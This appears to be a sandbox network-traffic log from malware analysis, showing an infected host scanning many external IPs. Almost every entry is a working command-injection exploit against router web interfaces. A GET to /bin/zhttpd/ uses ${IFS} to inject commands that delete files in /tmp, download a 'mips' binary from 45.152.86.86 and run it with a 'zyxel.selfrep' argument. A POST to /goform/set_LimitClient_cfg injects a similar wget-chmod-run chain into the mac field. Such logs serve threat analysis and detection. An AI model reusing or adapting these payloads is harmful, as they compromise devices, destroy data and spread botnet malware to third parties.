                              Mar 31, 2024 08:42:21.536485910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9620192.168.2.1334078115.34.167.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536539078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9621192.168.2.1342244179.245.12.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536572933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9622192.168.2.1355394148.69.201.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536633968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9623192.168.2.1353154144.57.209.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536669970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9624192.168.2.135385253.65.164.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536725998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9625192.168.2.135560231.218.116.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536781073 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9626192.168.2.1336586114.216.64.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536835909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9627192.168.2.1346436223.208.230.204443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536881924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9628192.168.2.135519878.10.80.130443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536931038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9629192.168.2.135295277.171.30.137443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.536972046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9630192.168.2.1345440209.251.213.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537009954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9631192.168.2.1342070212.71.161.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537060976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9632192.168.2.134258651.211.148.251443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537091970 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9633192.168.2.1343784106.19.123.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537144899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9634192.168.2.134472844.205.120.229443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537192106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9635192.168.2.133965250.112.11.78443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537223101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9636192.168.2.133953657.115.34.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537245989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9637192.168.2.1347960190.225.216.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.537286997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9638192.168.2.1343698142.118.50.107443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541213036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9639192.168.2.1334950125.35.8.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541249990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9640192.168.2.1336030166.21.182.131443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541285992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9641192.168.2.135990439.32.195.83443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541347027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9642192.168.2.1345410142.220.250.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541398048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9643192.168.2.13554962.248.177.127443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541451931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9644192.168.2.1345706158.15.208.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541486025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9645192.168.2.1335280190.243.254.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541512966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9646192.168.2.1347684134.96.176.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541585922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9647192.168.2.134925291.164.189.142443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541620016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9648192.168.2.1353066191.137.243.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541646004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9649192.168.2.1355034117.57.124.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541675091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9650192.168.2.1350280218.54.254.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541731119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9651192.168.2.134041491.12.121.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541760921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9652192.168.2.134755844.225.149.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541825056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9653192.168.2.135857481.216.46.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.541867971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9654192.168.2.1347602185.236.138.438080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:21.727354050 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:22.422585011 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:22.551707983 CEST173INHTTP/1.1 400 Bad Request
                              Content-Type: text/html;charset=iso-8859-1
                              Content-Length: 50
                              Connection: close
                              Data Raw: 3c 68 31 3e 42 61 64 20 4d 65 73 73 61 67 65 20 34 30 30 3c 2f 68 31 3e 3c 70 72 65 3e 72 65 61 73 6f 6e 3a 20 4e 6f 20 48 6f 73 74 3c 2f 70 72 65 3e
                              Data Ascii: <h1>Bad Message 400</h1><pre>reason: No Host</pre>


                              Session IDSource IPSource PortDestination IPDestination Port
                              9655192.168.2.1359256181.143.36.2028080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.018570900 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:22.272407055 CEST259INHTTP/1.1 501 Not Implemented
                              Connection: Keep-Alive
                              Content-Length: 121
                              Date: Sun, 31 Mar 2024 06:42:04 GMT
                              Expires: 0
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 31 3a 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <html><head><title>Error 501: Not Implemented</title></head><body><h1>Error 501: Not Implemented</h1></body></html>
                              Mar 31, 2024 08:42:22.272778988 CEST251INHTTP/1.0 503 unknown method
                              Connection: close
                              Content-Length: 119
                              Date: Sun, 31 Mar 2024 06:42:04 GMT
                              Expires: 0
                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 45 72 72 6f 72 20 35 30 33 3a 20 75 6e 6b 6e 6f 77 6e 20 6d 65 74 68 6f 64 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <html><head><title>Error 503: unknown method</title></head><body><h1>Error 503: unknown method</h1></body></html>


                              Session IDSource IPSource PortDestination IPDestination Port
                              9656192.168.2.1354764112.165.61.1358080
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.301259041 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                              Cookie: user=admin
                              Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                              Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                              Mar 31, 2024 08:42:22.583091021 CEST311INHTTP/1.0 400 Bad Request
                              Date: Sun, 31 Mar 2024 06:42:22 GMT
                              Server: Httpd/1.0
                              Connection: close
                              Content-Type: text/html; charset=ISO-8859-1
                              Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 59 6f 75 72 20 63 6c 69 65 6e 74 20 68 61 73 20 69 73 73 75 65 64 20 61 20 6d 61 6c 66 6f 72 6d 65 64 20 6f 72 20 69 6c 6c 65 67 61 6c 20 72 65 71 75 65 73 74 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                              Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Your client has issued a malformed or illegal request.</BODY></HTML>


                              Session IDSource IPSource PortDestination IPDestination Port
                              9657192.168.2.134190672.67.117.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550616980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9658192.168.2.1359608209.103.243.163443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550667048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9659192.168.2.1341404221.204.93.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550719976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9660192.168.2.133365654.54.209.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550769091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9661192.168.2.1340286131.189.44.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550806046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9662192.168.2.134243485.250.12.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550906897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9663192.168.2.134573650.97.24.97443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:22.550936937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9664192.168.2.1343946137.254.191.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.554979086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9665192.168.2.135680668.230.245.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555039883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9666192.168.2.1352894154.180.58.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555063009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9667192.168.2.13557605.183.174.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555110931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9668192.168.2.135586653.209.56.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555152893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9669192.168.2.135414250.255.82.87443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555197954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9670192.168.2.1335064203.16.47.168443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555238962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9671192.168.2.1344452111.60.53.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555284023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9672192.168.2.1350568119.140.185.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555334091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9673192.168.2.1343684189.55.206.122443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:42:23.555358887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9674192.168.2.135395643.19.154.126443
                              TimestampBytes transferredDirectionData
